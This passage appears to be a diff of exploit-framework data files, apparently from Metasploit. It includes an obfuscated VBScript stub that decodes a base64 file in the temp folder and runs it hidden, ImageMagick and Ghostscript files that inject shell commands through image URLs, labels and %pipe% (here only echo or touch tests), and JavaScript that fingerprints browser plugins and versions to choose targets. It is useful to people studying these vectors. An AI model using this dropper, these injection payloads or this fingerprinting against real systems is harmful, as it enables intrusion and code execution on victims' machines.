|
||||
echo decodedFile = Chr(92)+CHRDECFILE >>decode_stub
|
||||
echo scriptingFS = Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116) >>decode_stub
|
||||
echo scriptShell = Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108) >>decode_stub
|
||||
echo emptyString = Chr(84)+Chr(104)+Chr(101)+Chr(32)+Chr(102)+Chr(105)+Chr(108)+Chr(101)+Chr(32)+Chr(105)+Chr(115)+Chr(32)+Chr(101)+Chr(109)+Chr(112)+Chr(116)+Chr(121)+Chr(46)>>decode_stub
|
||||
echo tempString = Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37) >>decode_stub
|
||||
echo Base64Chars = Chr(65)+Chr(66)+Chr(67)+Chr(68)+Chr(69)+Chr(70)+Chr(71)+Chr(72)+Chr(73)+Chr(74)+Chr(75)+Chr(76)+Chr(77)+Chr(78)+Chr(79)+Chr(80)+Chr(81)+Chr(82)+Chr(83)+Chr(84)+Chr(85)+Chr(86)+Chr(87)+Chr(88)+Chr(89)+Chr(90)+Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+Chr(103)+Chr(104)+Chr(105)+Chr(106)+Chr(107)+Chr(108)+Chr(109)+Chr(110)+Chr(111)+Chr(112)+Chr(113)+Chr(114)+Chr(115)+Chr(116)+Chr(117)+Chr(118)+Chr(119)+Chr(120)+Chr(121)+Chr(122)+Chr(48)+Chr(49)+Chr(50)+Chr(51)+Chr(52)+Chr(53)+Chr(54)+Chr(55)+Chr(56)+Chr(57)+Chr(43)+Chr(47) >>decode_stub
|
||||
echo Set wshShell = CreateObject(scriptShell) >>decode_stub
|
||||
echo tempDir = wshShell.ExpandEnvironmentStrings(tempString) >>decode_stub
|
||||
echo Set fs = CreateObject(scriptingFS) >>decode_stub
|
||||
echo Set file = fs.GetFile(tempDir+encodedFile) >>decode_stub
|
||||
echo If file.Size Then >>decode_stub
|
||||
echo Set fd = fs.OpenTextFile(tempDir+encodedFile, 1) >>decode_stub
|
||||
echo data = fd.ReadAll >>decode_stub
|
||||
echo data = Replace(data, Chr(32)+vbCrLf, nil) >>decode_stub
|
||||
echo data = Replace(data, vbCrLf, nil) >>decode_stub
|
||||
echo data = base64_decode(data) >>decode_stub
|
||||
echo fd.Close >>decode_stub
|
||||
echo Set ofs = CreateObject(scriptingFS).OpenTextFile(tempDir+decodedFile, 2, True) >>decode_stub
|
||||
echo ofs.Write data >>decode_stub
|
||||
echo ofs.close >>decode_stub
|
||||
echo wshShell.run tempDir+decodedFile, 0, false >>decode_stub
|
||||
echo Else >>decode_stub
|
||||
echo Wscript.Echo emptyString >>decode_stub
|
||||
echo End If >>decode_stub
|
||||
echo Function base64_decode(byVal strIn) >>decode_stub
|
||||
echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
|
||||
echo For n = 1 To Len(strIn) Step 4 >>decode_stub
|
||||
echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
|
||||
echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
|
||||
echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
|
||||
echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
|
||||
echo If Not w2 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
|
||||
echo If Not w3 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
|
||||
echo If Not w4 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
|
||||
echo Next >>decode_stub
|
||||
echo base64_decode = strOut >>decode_stub
|
||||
echo End Function >>decode_stub
|
||||
echo Function mimedecode(byVal strIn) >>decode_stub
|
||||
echo If Len(strIn) = 0 Then >>decode_stub
|
||||
echo mimedecode = -1 : Exit Function >>decode_stub
|
||||
echo Else >>decode_stub
|
||||
echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
|
||||
echo End If >>decode_stub
|
||||
echo End Function >>decode_stub
|
|
@ -1,41 +0,0 @@
|
|||
echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
|
||||
echo Set file = fs.GetFile("ENCODED") >>decode_stub
|
||||
echo If file.Size Then >>decode_stub
|
||||
echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
|
||||
echo data = fd.ReadAll >>decode_stub
|
||||
echo data = Replace(data, vbCrLf, "") >>decode_stub
|
||||
echo data = base64_decode(data) >>decode_stub
|
||||
echo fd.Close >>decode_stub
|
||||
echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
|
||||
echo ofs.Write data >>decode_stub
|
||||
echo ofs.close >>decode_stub
|
||||
echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
|
||||
echo shell.run "DECODED", 0, false >>decode_stub
|
||||
echo Wscript.sleep(1000 * 60 * 5) >>decode_stub
|
||||
echo Else >>decode_stub
|
||||
echo Wscript.Echo "The file is empty." >>decode_stub
|
||||
echo End If >>decode_stub
|
||||
echo Function base64_decode(byVal strIn) >>decode_stub
|
||||
echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
|
||||
echo For n = 1 To Len(strIn) Step 4 >>decode_stub
|
||||
echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
|
||||
echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
|
||||
echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
|
||||
echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
|
||||
echo If Not w2 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
|
||||
echo If Not w3 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
|
||||
echo If Not w4 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
|
||||
echo Next >>decode_stub
|
||||
echo base64_decode = strOut >>decode_stub
|
||||
echo End Function >>decode_stub
|
||||
echo Function mimedecode(byVal strIn) >>decode_stub
|
||||
echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
|
||||
echo If Len(strIn) = 0 Then >>decode_stub
|
||||
echo mimedecode = -1 : Exit Function >>decode_stub
|
||||
echo Else >>decode_stub
|
||||
echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
|
||||
echo End If >>decode_stub
|
||||
echo End Function >>decode_stub
|
Binary file not shown.
|
@ -1,14 +0,0 @@
|
|||
id=ImageMagick version=1.0
|
||||
class=DirectClass colors=0 matte=False
|
||||
columns=1 rows=1 depth=16
|
||||
colorspace=sRGB
|
||||
page=1x1+0+0
|
||||
rendering-intent=Perceptual
|
||||
gamma=0.454545
|
||||
red-primary=0.64,0.33 green-primary=0.3,0.6 blue-primary=0.15,0.06
|
||||
white-point=0.3127,0.329
|
||||
date:create=2016-05-04T00:19:42-05:00
|
||||
date:modify=2016-05-04T00:19:42-05:00
|
||||
label={";echo vulnerable"}
|
||||
|
||||
:ÿÿÿÿÿÿ
|
|
@ -3,6 +3,6 @@ encoding "UTF-8"
|
|||
viewbox 0 0 1 1
|
||||
affine 1 0 0 1 0 0
|
||||
push graphic-context
|
||||
image Over 0,0 1,1 'https://localhost";echo vulnerable"'
|
||||
image Over 0,0 1,1 'https://localhost";echo vulnerable > /dev/tty"'
|
||||
pop graphic-context
|
||||
pop graphic-context
|
||||
|
|
|
@ -0,0 +1,4 @@
|
|||
%!PS
|
||||
currentdevice null true mark /OutputICCProfile (%pipe%echo vulnerable > /dev/tty)
|
||||
.putdeviceparams
|
||||
quit
|
|
@ -1,5 +1,5 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve"> <image id="image0" width="1" height="1" x="0" y="0"
|
||||
xlink:href="https://localhost";echo vulnerable"" />
|
||||
xlink:href="https://localhost";echo vulnerable > /dev/tty"" />
|
||||
</svg>
|
||||
|
|
Before Width: | Height: | Size: 593 B After Width: | Height: | Size: 604 B |
|
@ -1,14 +0,0 @@
|
|||
id=ImageMagick version=1.0
|
||||
class=DirectClass colors=0 matte=False
|
||||
columns=1 rows=1 depth=16
|
||||
colorspace=sRGB
|
||||
page=1x1+0+0
|
||||
rendering-intent=Perceptual
|
||||
gamma=0.454545
|
||||
red-primary=0.64,0.33 green-primary=0.3,0.6 blue-primary=0.15,0.06
|
||||
white-point=0.3127,0.329
|
||||
date:create=2016-05-04T00:19:42-05:00
|
||||
date:modify=2016-05-04T00:19:42-05:00
|
||||
label={";touch vulnerable"}
|
||||
|
||||
:ÿÿÿÿÿÿ
|
|
@ -3,6 +3,6 @@ encoding "UTF-8"
|
|||
viewbox 0 0 1 1
|
||||
affine 1 0 0 1 0 0
|
||||
push graphic-context
|
||||
image Over 0,0 1,1 '|touch vulnerable'
|
||||
image Over 0,0 1,1 '|echo vulnerable > /dev/tty'
|
||||
pop graphic-context
|
||||
pop graphic-context
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve"> <image id="image0" width="1" height="1" x="0" y="0"
|
||||
xlink:href="|touch vulnerable" />
|
||||
xlink:href="|echo vulnerable > /dev/tty" />
|
||||
</svg>
|
||||
|
|
Before Width: | Height: | Size: 480 B After Width: | Height: | Size: 490 B |
|
@ -1,89 +0,0 @@
|
|||
var ie_addons_detect = { };
|
||||
|
||||
/**
|
||||
* Returns true if this ActiveX is available, otherwise false.
|
||||
* Grabbed this directly from browser_autopwn.rb
|
||||
**/
|
||||
ie_addons_detect.hasActiveX = function (axo_name, method) {
|
||||
var axobj = null;
|
||||
if (axo_name.substring(0,1) == String.fromCharCode(123)) {
|
||||
axobj = document.createElement("object");
|
||||
axobj.setAttribute("classid", "clsid:" + axo_name);
|
||||
axobj.setAttribute("id", axo_name);
|
||||
axobj.setAttribute("style", "visibility: hidden");
|
||||
axobj.setAttribute("width", "0px");
|
||||
axobj.setAttribute("height", "0px");
|
||||
document.body.appendChild(axobj);
|
||||
if (typeof(axobj[method]) == 'undefined') {
|
||||
var attributes = 'id="' + axo_name + '"';
|
||||
attributes += ' classid="clsid:' + axo_name + '"';
|
||||
attributes += ' style="visibility: hidden"';
|
||||
attributes += ' width="0px" height="0px"';
|
||||
document.body.innerHTML += "<object " + attributes + "></object>";
|
||||
axobj = document.getElementById(axo_name);
|
||||
}
|
||||
} else {
|
||||
try {
|
||||
axobj = new ActiveXObject(axo_name);
|
||||
} catch(e) {
|
||||
// If we can't build it with an object tag and we can't build it
|
||||
// with ActiveXObject, it can't be built.
|
||||
return false;
|
||||
};
|
||||
}
|
||||
if (typeof(axobj[method]) != 'undefined') {
|
||||
return true;
|
||||
}
|
||||
|
||||
return false;
|
||||
};
|
||||
|
||||
/**
|
||||
* Returns the version of Microsoft Office. If not found, returns null.
|
||||
**/
|
||||
ie_addons_detect.getMsOfficeVersion = function () {
|
||||
var version;
|
||||
var types = new Array();
|
||||
for (var i=1; i <= 5; i++) {
|
||||
try {
|
||||
types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString()));
|
||||
}
|
||||
catch (e) {
|
||||
types[i-1] = null;
|
||||
}
|
||||
}
|
||||
|
||||
if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
|
||||
types[3] == 'object' && types[4] == 'object')
|
||||
{
|
||||
version = "2012";
|
||||
}
|
||||
else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
|
||||
types[3] == 'object' && types[4] == null)
|
||||
{
|
||||
version = "2010";
|
||||
}
|
||||
else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
|
||||
types[3] == null && types[4] == null)
|
||||
{
|
||||
version = "2007";
|
||||
}
|
||||
else if (types[0] == 'object' && types[1] == 'object' && types[2] == null &&
|
||||
types[3] == null && types[4] == null)
|
||||
{
|
||||
version = "2003";
|
||||
}
|
||||
else if (types[0] == 'object' && types[1] == null && types[2] == null &&
|
||||
types[3] == null && types[4] == null)
|
||||
{
|
||||
// If run for the first time, you must manullay allow the "Microsoft Office XP"
|
||||
// add-on to run. However, this prompt won't show because the ActiveXObject statement
|
||||
// is wrapped in an exception handler.
|
||||
version = "xp";
|
||||
}
|
||||
else {
|
||||
version = null;
|
||||
}
|
||||
|
||||
return version;
|
||||
}
|
|
@ -1,157 +0,0 @@
|
|||
var misc_addons_detect = { };
|
||||
|
||||
|
||||
/**
|
||||
* Detects whether the browser supports Silverlight or not
|
||||
**/
|
||||
misc_addons_detect.hasSilverlight = function () {
|
||||
var found = false;
|
||||
|
||||
//
|
||||
// When on IE, we can use AgControl.AgControl to actually detect the version too.
|
||||
// But this ability is specific to IE, so we fall back to just true/false response
|
||||
//
|
||||
try {
|
||||
var ax = new ActiveXObject('AgControl.AgControl');
|
||||
found = true;
|
||||
} catch(e) {}
|
||||
|
||||
//
|
||||
// ActiveX didn't get anything, try looking in MIMEs
|
||||
//
|
||||
if (!found) {
|
||||
var mimes = window.navigator.mimeTypes;
|
||||
for (var i=0; i < mimes.length; i++) {
|
||||
if (/x\-silverlight/.test(mimes[i].type)) {
|
||||
found = true;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
//
|
||||
// MIMEs didn't work either. Try navigator.
|
||||
//
|
||||
if (!found) {
|
||||
var count = navigator.plugins.length;
|
||||
for (var i=0; i < count; i++) {
|
||||
var pluginName = navigator.plugins[i].name;
|
||||
if (/Silverlight Plug\-In/.test(pluginName)) {
|
||||
found = true;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return found;
|
||||
}
|
||||
|
||||
/**
|
||||
* Returns the Adobe Flash version
|
||||
**/
|
||||
misc_addons_detect.getFlashVersion = function () {
|
||||
var foundVersion = null;
|
||||
|
||||
//
|
||||
// Gets the Flash version by using the GetVariable function via ActiveX
|
||||
//
|
||||
try {
|
||||
var ax = new ActiveXObject('ShockwaveFlash.ShockwaveFlash').GetVariable('$version').toString();
|
||||
foundVersion = ax.match(/[\d,]+/g)[0].replace(/,/g, '.')
|
||||
} catch (e) {}
|
||||
|
||||
//
|
||||
// This should work fine for most non-IE browsers
|
||||
//
|
||||
if (foundVersion == null) {
|
||||
var mimes = window.navigator.mimeTypes;
|
||||
for (var i=0; i<mimes.length; i++) {
|
||||
var pluginDesc = mimes[i].enabledPlugin.description.toString();
|
||||
var m = pluginDesc.match(/Shockwave Flash [\d\.]+/g);
|
||||
if (m != null) {
|
||||
foundVersion = m[0].match(/\d.+/g)[0];
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
//
|
||||
// Detection for Windows + Firefox
|
||||
//
|
||||
if (foundVersion == null) {
|
||||
var pluginsCount = navigator.plugins.length;
|
||||
for (i=0; i < pluginsCount; i++) {
|
||||
var pluginName = navigator.plugins[i].name;
|
||||
var pluginVersion = navigator.plugins[i].version;
|
||||
if (/Shockwave Flash/.test(pluginName) && pluginVersion != undefined) {
|
||||
foundVersion = navigator.plugins[i].version;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return foundVersion;
|
||||
}
|
||||
|
||||
/**
|
||||
* Returns the Java version
|
||||
**/
|
||||
misc_addons_detect.getJavaVersion = function () {
|
||||
var foundVersion = null;
|
||||
|
||||
//
|
||||
// This finds the Java version from Java WebStart's ActiveX control
|
||||
// This is specific to Windows
|
||||
//
|
||||
for (var i1=0; i1 < 10; i1++) {
|
||||
for (var i2=0; i2 < 10; i2++) {
|
||||
for (var i3=0; i3 < 10; i3++) {
|
||||
for (var i4=0; i4 < 10; i4++) {
|
||||
var version = String(i1) + "." + String(i2) + "." + String(i3) + "." + String(i4);
|
||||
var progId = "JavaWebStart.isInstalled." + version;
|
||||
try {
|
||||
new ActiveXObject(progId);
|
||||
return version;
|
||||
}
|
||||
catch (e) {
|
||||
continue;
|
||||
}
|
||||
}}}}
|
||||
|
||||
//
|
||||
// This finds the Java version from window.navigator.mimeTypes
|
||||
// This seems to work pretty well for most browsers except for IE
|
||||
//
|
||||
if (foundVersion == null) {
|
||||
var mimes = window.navigator.mimeTypes;
|
||||
for (var i=0; i<mimes.length; i++) {
|
||||
var m = /java.+;version=(.+)/.exec(mimes[i].type);
|
||||
if (m) {
|
||||
var version = parseFloat(m[1]);
|
||||
if (version > foundVersion) {
|
||||
foundVersion = version;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
//
|
||||
// This finds the Java version from navigator plugins
|
||||
// This is necessary for Windows + Firefox setup, but the check isn't as good as the mime one.
|
||||
// So we do this last.
|
||||
//
|
||||
if (foundVersion == null) {
|
||||
var foundJavaString = "";
|
||||
var pluginsCount = navigator.plugins.length;
|
||||
for (i=0; i < pluginsCount; i++) {
|
||||
var pluginName = navigator.plugins[i].name;
|
||||
var pluginVersion = navigator.plugins[i].version;
|
||||
if (/Java/.test(pluginName) && pluginVersion != undefined) {
|
||||
foundVersion = navigator.plugins[i].version;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return foundVersion;
|
||||
}
|
|
@ -1,831 +0,0 @@
|
|||
// Case matters, see lib/msf/core/constants.rb
|
||||
// All of these should match up with constants in ::Msf::HttpClients
|
||||
var clients_opera = "Opera";
|
||||
var clients_ie = "MSIE";
|
||||
var clients_ff = "Firefox";
|
||||
var clients_chrome = "Chrome";
|
||||
var clients_safari = "Safari";
|
||||
|
||||
// All of these should match up with constants in ::Msf::OperatingSystems
|
||||
var oses_linux = "Linux";
|
||||
var oses_android = "Android";
|
||||
var oses_windows = "Windows";
|
||||
var oses_mac_osx = "Mac OS X";
|
||||
var oses_apple_ios = "iOS";
|
||||
var oses_freebsd = "FreeBSD";
|
||||
var oses_netbsd = "NetBSD";
|
||||
var oses_openbsd = "OpenBSD";
|
||||
|
||||
// All of these should match up with the ARCH_* constants
|
||||
var arch_armle = "armle";
|
||||
var arch_x86 = "x86";
|
||||
var arch_x86_64 = "x86_64";
|
||||
var arch_ppc = "ppc";
|
||||
var arch_mipsle = "mipsle";
|
||||
|
||||
var os_detect = {};
|
||||
|
||||
/**
|
||||
* This can reliably detect browser versions for IE and Firefox even in the
|
||||
* presence of a spoofed User-Agent. OS detection is more fragile and
|
||||
* requires truthful navigator.appVersion and navigator.userAgent strings in
|
||||
* order to be accurate for more than just IE on Windows.
|
||||
**/
|
||||
os_detect.getVersion = function(){
|
||||
//Default values:
|
||||
var os_name;
|
||||
var os_vendor;
|
||||
var os_device;
|
||||
var os_flavor;
|
||||
var os_sp;
|
||||
var os_lang;
|
||||
var ua_name;
|
||||
var ua_version;
|
||||
var arch = "";
|
||||
var useragent = navigator.userAgent;
|
||||
// Trust but verify...
|
||||
var ua_is_lying = false;
|
||||
|
||||
var version = "";
|
||||
var unknown_fingerprint = null;
|
||||
|
||||
var css_is_valid = function(prop, propCamelCase, css) {
|
||||
if (!document.createElement) return false;
|
||||
var d = document.createElement('div');
|
||||
d.setAttribute('style', prop+": "+css+";")
|
||||
return d.style[propCamelCase] === css;
|
||||
}
|
||||
|
||||
var input_type_is_valid = function(input_type) {
|
||||
if (!document.createElement) return false;
|
||||
var input = document.createElement('input');
|
||||
input.setAttribute('type', input_type);
|
||||
return input.type == input_type;
|
||||
}
|
||||
|
||||
//--
|
||||
// Client
|
||||
//--
|
||||
if (window.opera) {
|
||||
ua_name = clients_opera;
|
||||
if (!navigator.userAgent.match(/Opera/)) {
|
||||
ua_is_lying = true;
|
||||
}
|
||||
// This seems to be completely accurate, e.g. "9.21" is the return
|
||||
// value of opera.version() when run on Opera 9.21
|
||||
ua_version = opera.version();
|
||||
if (!os_name) {
|
||||
// The 'inconspicuous' argument is there to give us a real value on
|
||||
// Opera 6 where, without it, the return value is supposedly
|
||||
// 'Hm, were you only as smart as Bjorn Vermo...'
|
||||
// though I have not verfied this claim.
|
||||
switch (opera.buildNumber('inconspicuous')) {
|
||||
case "344": // opera-9.0-20060616.1-static-qt.i386-en-344
|
||||
case "1347": // Opera 9.80 / Ubuntu 10.10 (Karmic Koala)
|
||||
case "2091": // opera-9.52-2091.gcc3-shared-qt3.i386.rpm
|
||||
case "2444": // opera-9.60.gcc4-shared-qt3.i386.rpm
|
||||
case "2474": // Opera 9.63 / Debian Testing (Lenny)
|
||||
case "4102": // Opera 10.00 / Ubuntu 8.04 LTS (Hardy Heron)
|
||||
case "6386": // 10.61
|
||||
os_name = oses_linux;
|
||||
break;
|
||||
case "1074": // Opera 11.50 / Windows XP
|
||||
case "1100": // Opera 11.52 / Windows XP
|
||||
case "3445": // 10.61
|
||||
case "3516": // Opera 10.63 / Windows XP
|
||||
case "7730": // Opera 8.54 / Windows XP
|
||||
case "8502": // "Opera 9 Eng Setup.exe"
|
||||
case "8679": // "Opera_9.10_Eng_Setup.exe"
|
||||
case "8771": // "Opera_9.20_Eng_Setup.exe"
|
||||
case "8776": // "Opera_9.21_Eng_Setup.exe"
|
||||
case "8801": // "Opera_9.22_Eng_Setup.exe"
|
||||
case "10108": // "Opera_952_10108_en.exe"
|
||||
case "10467": // "Opera_962_en_Setup.exe"
|
||||
case "10476": // Opera 9.63 / Windows XP
|
||||
case "WMD-50433": // Windows Mobile - "Mozilla/5.0 (Windows Mobile; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.00"
|
||||
os_name = oses_windows;
|
||||
break;
|
||||
case "2480": // Opera 9.64 / FreeBSD 7.0
|
||||
os_name = oses_freebsd;
|
||||
break;
|
||||
case "6386": // 10.61
|
||||
os_name = oses_mac_osx;
|
||||
break;
|
||||
case "1407":
|
||||
// In the case of mini versions, the UA is quite a bit
|
||||
// harder to spoof, so it's correspondingly easier to
|
||||
// trust. Unfortunately, despite being fairly truthful in
|
||||
// what OS it's running on, Opera mini seems to lie like a
|
||||
// rug in regards to the browser version.
|
||||
//
|
||||
// iPhone, iOS 5.0.1
|
||||
// Opera/9.80 (iPhone; Opera Mini/7.1.32694/27.1407; U; en) Presto/2.8.119 Version/11.10.10
|
||||
// Android 2.3.6, opera mini 7.1
|
||||
// Opera/9.80 (Android; Opera Mini/7.29530/27.1407; U; en) Presto/2.8.119 Version/11.101.10
|
||||
if (navigator.userAgent.indexOf("Android")) {
|
||||
os_name = oses_android;
|
||||
} else if (navigator.userAgent.indexOf("iPhone")) {
|
||||
os_name = oses_apple_ios;
|
||||
os_device = "iPhone";
|
||||
}
|
||||
break;
|
||||
// A few are ambiguous, record them here
|
||||
case "1250":
|
||||
// Opera 9.80 / Windows XP
|
||||
// Opera 11.61 / Windows XP
|
||||
// Opera 11.61 / Debian 4.0 (Etch)
|
||||
break;
|
||||
default:
|
||||
unknown_fingerprint = opera.buildNumber('inconspicuous');
|
||||
break;
|
||||
}
|
||||
}
|
||||
} else if (typeof window.onmousewheel != 'undefined' && ! (typeof ScriptEngineMajorVersion == 'function') ) { // IE 10 now has onmousewheel
|
||||
|
||||
// Then this is webkit, could be Safari or Chrome.
|
||||
// Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
|
||||
// Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
|
||||
// Mozilla/5.0 (Linux; U; Android 2.2; en-au; GT-I9000 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
|
||||
// Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8C148
|
||||
// Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
|
||||
// Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3
|
||||
|
||||
// Google Chrome has window.google (older versions), window.chromium (older versions), and window.window.chrome (3+)
|
||||
if (window.chromium || window.google || window.chrome) {
|
||||
ua_name = clients_chrome;
|
||||
search = "Chrome";
|
||||
} else {
|
||||
ua_name = clients_safari;
|
||||
search = "Version";
|
||||
}
|
||||
|
||||
platform = navigator.platform.toLowerCase();
|
||||
// Just to be a pain, iPod and iPad both leave off "Safari" and
|
||||
// "Version" in the UA, see example above. Grab the webkit version
|
||||
// instead. =/
|
||||
if (platform.match(/ipod/)) {
|
||||
os_name = oses_apple_ios;
|
||||
os_device = "iPod";
|
||||
arch = arch_armle;
|
||||
search = "AppleWebKit";
|
||||
} else if (platform.match(/ipad/)) {
|
||||
os_name = oses_apple_ios;
|
||||
os_device = "iPad";
|
||||
arch = arch_armle;
|
||||
search = "AppleWebKit";
|
||||
} else if (platform.match(/iphone/)) {
|
||||
os_name = oses_apple_ios;
|
||||
os_device = "iPhone";
|
||||
arch = arch_armle;
|
||||
} else if (platform.match(/macintel/)) {
|
||||
os_name = oses_mac_osx;
|
||||
arch = arch_x86;
|
||||
} else if (platform.match(/linux/)) {
|
||||
os_name = oses_linux;
|
||||
|
||||
if (platform.match(/x86_64/)) {
|
||||
arch = arch_x86_64;
|
||||
} else if (platform.match(/arm/)) {
|
||||
arch = arch_armle;
|
||||
} else if (platform.match(/x86/)) {
|
||||
arch = arch_x86;
|
||||
} else if (platform.match(/mips/)) {
|
||||
arch = arch_mipsle;
|
||||
}
|
||||
|
||||
// Android overrides Linux
|
||||
if (navigator.userAgent.match(/android/i)) {
|
||||
os_name = oses_android;
|
||||
}
|
||||
} else if (platform.match(/windows/)) {
|
||||
os_name = oses_windows;
|
||||
}
|
||||
|
||||
ua_version = this.searchVersion(search, navigator.userAgent);
|
||||
if (!ua_version || 0 == ua_version.length) {
|
||||
ua_is_lying = true;
|
||||
}
|
||||
} else if (navigator.oscpu && !document.all && navigator.taintEnabled || 'MozBlobBuilder' in window) {
|
||||
// Use taintEnabled to identify FF since other recent browsers
|
||||
// implement window.getComputedStyle now. For some reason, checking for
|
||||
// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
|
||||
// isn't IE first.
|
||||
|
||||
// Also check MozBlobBuilder because FF 9.0.1 does not support taintEnabled
|
||||
|
||||
// Then this is a Gecko derivative, assume Firefox since that's the
|
||||
// only one we have sploits for. We may need to revisit this in the
|
||||
// future. This works for multi/browser/mozilla_compareto against
|
||||
// Firefox and Mozilla, so it's probably good enough for now.
|
||||
ua_name = clients_ff;
|
||||
// Thanks to developer.mozilla.org "Firefox for developers" series for most
|
||||
// of these.
|
||||
// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
|
||||
if ('closest' in Element.prototype) {
|
||||
ua_version = '35.0';
|
||||
} else if ('matches' in Element.prototype) {
|
||||
ua_version = '34.0';
|
||||
} else if ('RadioNodeList' in window) {
|
||||
ua_version = '33.0';
|
||||
} else if ('copyWithin' in Array.prototype) {
|
||||
ua_version = '32.0';
|
||||
} else if ('fill' in Array.prototype) {
|
||||
ua_version = '31.0';
|
||||
} else if (css_is_valid('background-blend-mode', 'backgroundBlendMode', 'multiply')) {
|
||||
ua_version = '30.0';
|
||||
} else if (css_is_valid('box-sizing', 'boxSizing', 'border-box')) {
|
||||
ua_version = '29.0';
|
||||
} else if (css_is_valid('flex-wrap', 'flexWrap', 'nowrap')) {
|
||||
ua_version = '28.0';
|
||||
} else if (css_is_valid('cursor', 'cursor', 'grab')) {
|
||||
ua_version = '27.0';
|
||||
} else if (css_is_valid('image-orientation',
|
||||
'imageOrientation',
|
||||
'0deg')) {
|
||||
ua_version = '26.0';
|
||||
} else if (css_is_valid('background-attachment',
|
||||
'backgroundAttachment',
|
||||
'local')) {
|
||||
ua_version = '25.0';
|
||||
} else if ('DeviceStorage' in window && window.DeviceStorage &&
|
||||
'default' in window.DeviceStorage.prototype) {
|
||||
// https://bugzilla.mozilla.org/show_bug.cgi?id=874213
|
||||
ua_version = '24.0';
|
||||
} else if (input_type_is_valid('range')) {
|
||||
ua_version = '23.0';
|
||||
} else if ('HTMLTimeElement' in window) {
|
||||
ua_version = '22.0';
|
||||
} else if ('createElement' in document &&
|
||||
